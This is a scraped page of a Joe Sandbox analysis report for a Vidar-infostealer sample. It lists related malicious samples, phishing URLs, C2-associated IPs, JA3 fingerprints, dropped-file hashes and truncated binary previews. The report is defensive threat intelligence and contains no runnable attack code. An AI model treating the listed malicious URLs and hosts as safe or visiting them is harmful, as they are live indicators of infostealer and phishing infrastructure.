	Document-0191536.pdf.lnk.download.lnk	Get hash	malicious	Unknown	Browse	2.22.242.11
	[EXTERNAL] FWD_ Billing statement SRG-4545-JJJHH- 29 January ,2025.eml	Get hash	malicious	Unknown	Browse	2.19.126.145
	SoftWareGX.exe	Get hash	malicious	Vidar	Browse	2.22.242.105
	82.msi	Get hash	malicious	Unknown	Browse	2.22.242.11
	random.exe	Get hash	malicious	Vidar	Browse	2.22.242.105
	el.msi	Get hash	malicious	Unknown	Browse	2.19.126.145
	Purchase_Agreement_1020036.pdf.lnk.bin.lnk	Get hash	malicious	Unknown	Browse	2.19.126.152
	installer.msi	Get hash	malicious	Unknown	Browse	2.19.11.98
	NRKCZ1PSDM.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	2.19.11.98

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	FOZkdjzquG.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.253.45
	m68k.elf	Get hash	malicious	Unknown	Browse	209.240.200.5
	nabmpsl.elf	Get hash	malicious	Unknown	Browse	167.105.187.213
	jklsh4.elf	Get hash	malicious	Unknown	Browse	20.48.249.202
	nklsh4.elf	Get hash	malicious	Unknown	Browse	13.103.83.121
	nklmpsl.elf	Get hash	malicious	Unknown	Browse	52.125.71.211
	splarm5.elf	Get hash	malicious	Unknown	Browse	13.103.35.212
	nklarm.elf	Get hash	malicious	Unknown	Browse	20.209.210.98
	nabspc.elf	Get hash	malicious	Unknown	Browse	20.195.134.219
	nabarm5.elf	Get hash	malicious	Unknown	Browse	170.165.225.69
TELEGRAMRU	https://tornlinke.com/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://wbhflznpgrvct.ink/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://xjklvmtdocqwz.top/	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
	http://redr.me/2ebpf2/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://grape-1738094562314.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	http://rwymbkgnjdx.wang/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://wtjkenbk.top/	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
	EFT-Remittance-Slip-for-Due-Invoice.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	5646654.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	random.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
CLOUDFLARENETUS	FOZkdjzquG.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.18.116
	Swift copy.exe	Get hash	malicious	FormBook	Browse	104.21.3.103
	Full_S#U03b5#U03c4#U03c5#U03c1.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.149.66
	Full_S#U03b5#U03c4#U03c5#U03c1_patched.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	CxtwMdP64t.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.149.66
	xi6DPT8iWa.exe	Get hash	malicious	Unknown	Browse	172.67.179.207
	fJxdxyzaFz.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.149.66
	91vRUtyAmW.exe	Get hash	malicious	Unknown	Browse	172.67.179.207
	eGmG4rYdJ2.exe	Get hash	malicious	DCRat	Browse	104.21.80.1
	m4JIZpBl3o.exe	Get hash	malicious	Unknown	Browse	104.21.36.165

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	00wVZ1NU5b.exe	Get hash	malicious	Unknown	Browse	40.113.110.67
	givemebestoutputwithfreemindgoodforentiregood.hta	Get hash	malicious	Cobalt Strike	Browse	40.113.110.67
	nicegirlgivenmebestthingswithentiretimegoodfor.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	40.113.110.67
	WNqzT7mxfC.lnk	Get hash	malicious	Unknown	Browse	40.113.110.67
	file.lnk	Get hash	malicious	Unknown	Browse	40.113.110.67
	http://upholdil-ogin.godaddysites.com/	Get hash	malicious	HTMLPhisher	Browse	40.113.110.67
	dn0uAKsZoo.lnk	Get hash	malicious	Unknown	Browse	40.113.110.67
	CD4QsBaOy9.lnk	Get hash	malicious	Unknown	Browse	40.113.110.67
	6qLEfplqi1.lnk	Get hash	malicious	Unknown	Browse	40.113.110.67
	20Y8DUj1qE.ps1	Get hash	malicious	Unknown	Browse	40.113.110.67
37f463bf4616ecd445d4a1937da06e19	CxtwMdP64t.exe	Get hash	malicious	LummaC Stealer	Browse	116.202.5.153 149.154.167.99
	xi6DPT8iWa.exe	Get hash	malicious	Unknown	Browse	116.202.5.153 149.154.167.99
	91vRUtyAmW.exe	Get hash	malicious	Unknown	Browse	116.202.5.153 149.154.167.99
	xICYXGvuR1.exe	Get hash	malicious	Unknown	Browse	116.202.5.153 149.154.167.99
	1QmM7DzcnT.exe	Get hash	malicious	Unknown	Browse	116.202.5.153 149.154.167.99
	gcGk1SoPpg.exe	Get hash	malicious	Unknown	Browse	116.202.5.153 149.154.167.99
	5646654.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	116.202.5.153 149.154.167.99
	random.exe	Get hash	malicious	Vidar	Browse	116.202.5.153 149.154.167.99
	random.exe	Get hash	malicious	Amadey, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar	Browse	116.202.5.153 149.154.167.99
	setup.exe	Get hash	malicious	Unknown	Browse	116.202.5.153 149.154.167.99

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\phlng\pp8q1n	random.exe	Get hash	malicious	Vidar	Browse
	2E02vIiMfd.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, Vidar	Browse
	random.exe	Get hash	malicious	Vidar	Browse
	25xTHcaF7V.exe	Get hash	malicious	Vidar	Browse
	test.hta	Get hash	malicious	Vidar	Browse
	din.exe	Get hash	malicious	Vidar	Browse
	yoda.exe	Get hash	malicious	Vidar	Browse
	lem.exe	Get hash	malicious	Vidar	Browse
	script.ps1	Get hash	malicious	Vidar	Browse
	Setup.msi	Get hash	malicious	Vidar	Browse
C:\Users\user\AppData\Local\Temp\815387\Cet.com	W6Wj4yCmmU.exe	Get hash	malicious	KeyLogger, StormKitty, VenomRAT	Browse
	New V1.0.1.exe	Get hash	malicious	RHADAMANTHYS	Browse
	setup.exe	Get hash	malicious	LummaC Stealer	Browse
	setup.exe	Get hash	malicious	LummaC Stealer	Browse
	random.exe	Get hash	malicious	Vidar	Browse
	n395XXd8UE.exe	Get hash	malicious	LummaC Stealer	Browse
	p199AjsEFs.exe	Get hash	malicious	Amadey, AsyncRAT, KeyLogger, LummaC Stealer, PureLog Stealer, ReverseShell, Stealc	Browse
	New v2.2.0.exe	Get hash	malicious	LummaC Stealer	Browse
	A_acid11.exe	Get hash	malicious	LummaC Stealer	Browse
	2E02vIiMfd.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, Vidar	Browse

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Process:	C:\Users\user\AppData\Local\Temp\815387\Cet.com
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1095
Entropy (8bit):	4.976174799333973
Encrypted:	false
SSDEEP:	24:p/o2e8ZR+UX6g0cj3+3A63sDEF4wwVpQwuoMBX0FCUK:22e8v+DgfLUwY4fcZB2A
MD5:	ECC51190BD585AB376691BBDDF2A638B
SHA1:	84DE01CF25B71C0BC4D16FAF65BE1589E385EAF0
SHA-256:	6F15C7E90A3C414BEAD4C1C50DC5E7CAB987D72E2F49953B717A879D7745038C
SHA-512:	C0626F92BD934A3C5295EA32D63910C3F51E0A47CB6287C698C0DF7EE66C1D1A1867FDE10F824BD7514566C69CD2DA16571D3F0DC56FE9DE39D13F89DFE2A02A
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-Embedded-KeyboardFilterService-Client".. processorArchitecture="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. replacementSettingsVersionRange="0-1".. settingsVersion="2".. >.. <machineSpecific>.. <migXml xmlns="">.. Per-machine state -->.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SOFTWARE\Microsoft\Windows Embedded\KeyboardFilter\ [*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\MsKeyboardFilter [Start]</pattern>.. </objectSet>.. </inc

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44980
Entropy (8bit):	6.095116937430086
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4xWdNi1zNtkzaxS9YkIbbTImKJDSgzMMd6qD47u3+CiB:+/Ps+wsI7yOIzb4KtSmd6qE7lFoC
MD5:	01EFABF9A2352BE84E010095E85A0673
SHA1:	2E50BEB29E511E65928F670003EB0AA47EADFBD1
SHA-256:	70F6620FDB416E8F9DDA567152C3A6240C2BF9A3F291946AA13BE42B1FC04EE6
SHA-512:	39722F83585519E82CF83DCD163C842185CA1D0C9D76C92BCF28BA7BBA8AE53C3B2C350AE938D9FD53E1142B8D6FBF40BA6C4C45A6FFD51A9CDF83480CEAFEB5
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: W6Wj4yCmmU.exe, Detection: malicious, Browse Filename: New V1.0.1.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse Filename: random.exe, Detection: malicious, Browse Filename: n395XXd8UE.exe, Detection: malicious, Browse Filename: p199AjsEFs.exe, Detection: malicious, Browse Filename: New v2.2.0.exe, Detection: malicious, Browse Filename: A_acid11.exe, Detection: malicious, Browse Filename: 2E02vIiMfd.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	2420
Entropy (8bit):	5.303511450506391
Encrypted:	false
SSDEEP:	48:g9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJcdj:8SEA5O5W+MfH5S1CqlVJc5
MD5:	D10840751E0A294EE11E0450BD232A47
SHA1:	A905F59E2EC8F077B9723C5328B8DDDF9B1F20F2
SHA-256:	9845BD7B5FD111F587B32B6AD55DC7BDD7E8852996496692FB1484C91D579F4F
SHA-512:	1F424B9EADAB3EF4498E90D8D7B907417AC00CC9572B4868B2ED135FF93FCB238BBB970244692C03A394F0E628C69170F5F084F3F4D27B5B00F2EED67B80ED2D
Malicious:	false
Preview:	Favors........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B..........................................................................................................................................................................................................................................................................

Process:	C:\Users\user\Desktop\1l1ohfybAf.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	89088
Entropy (8bit):	7.997686250258099
Encrypted:	true
SSDEEP:	1536:UBpA95anvTpmGeC6ooFh4E8zAnP3OUZhkpzFwlEQvoVNjoUFoJLLp7AP4Th+CO:R9EvdL96FX4EWAP3O5pJwboZFsLL/TC
MD5:	33774683E002C9D308A7EAA73064D3FE
SHA1:	87969186B30CDF8E340488CD059002C1C0D72DBB
SHA-256:	5B166DCD4A1DA1C243F4BCDFABD93FF124D93CE39AB3E64D87C04FACC7F78432
SHA-512:	87998CF377E5EDC04A9D418703F9376D181315E9FC6CC59ED4149D02853C5B268ACAF6CBFE04659F87BB357B6DC92C4618E3525E775EAB5D547A6AC6B79D0AD0
Malicious:	false
Preview:	.]#.L.PAa21.....j....).8.L...[(.kK4..aK............h..VX..}.KTn.ua.F..)..u..$.].D^P.........V.Xk.y........P4.ho...a...Q...%O.<....y.]F.......t..~.n..o(.y.s..{..,.......1Oc....J.Hm.47.W....+.~yP..Y7.!......#..0.<..Z..1.....91/z....KS>x.x........a.9>......?....O?.<....Ds!H..wK:..`U..=?N9.."....U...+WW...w..r.%F.........zQ..O\..2....Cnw.iq.WU.y.......V..@.=..j..{....1..ccO"....}Y@...C....:)...d...../.5W..4.E.....[/~.hc..ZL..]i.@\A......POe.+.....5<.d..]).......P.z......f..@..h....}.....i....;...Ks.I...G-.r..........]..ZT".Y.... ...A.....7.27.........\|}...9.p.w........`e.a.7.=...sl.y<}.m.^r.P0..L.r.On....$.}...._.e..Jb...j..TgGi.O.L.]y....]..E... .....gOLX{V3......./..e....$t}.G`..}..^.!.\....s..>...E.le...3..ivY.{>f.S..$v.k..Y..?.Vd:..@%...x.H.IN.L X..1!.....&...v..Y.-&.....l.v`M..n.3.RXFk.kT_..U.t....DTu.K5.k.KL....@1..T.!.L..<f....N.@....nh...5..CJ.C.#.).......yd.Y....`\|.8..O....g..y.\..}...G.....J]..L.....18.Z.<.#.j........

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1l1ohfybAf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\phlng\5f3wl6

C:\ProgramData\phlng\5ppzus

C:\ProgramData\phlng\6fkfkx

C:\ProgramData\phlng\6xl68g

C:\ProgramData\phlng\8y5fk6

C:\ProgramData\phlng\8ycb1n

C:\ProgramData\phlng\8ym7qq

C:\ProgramData\phlng\900h4w

C:\ProgramData\phlng\b1n7gv

Windows Analysis Report
1l1ohfybAf.exe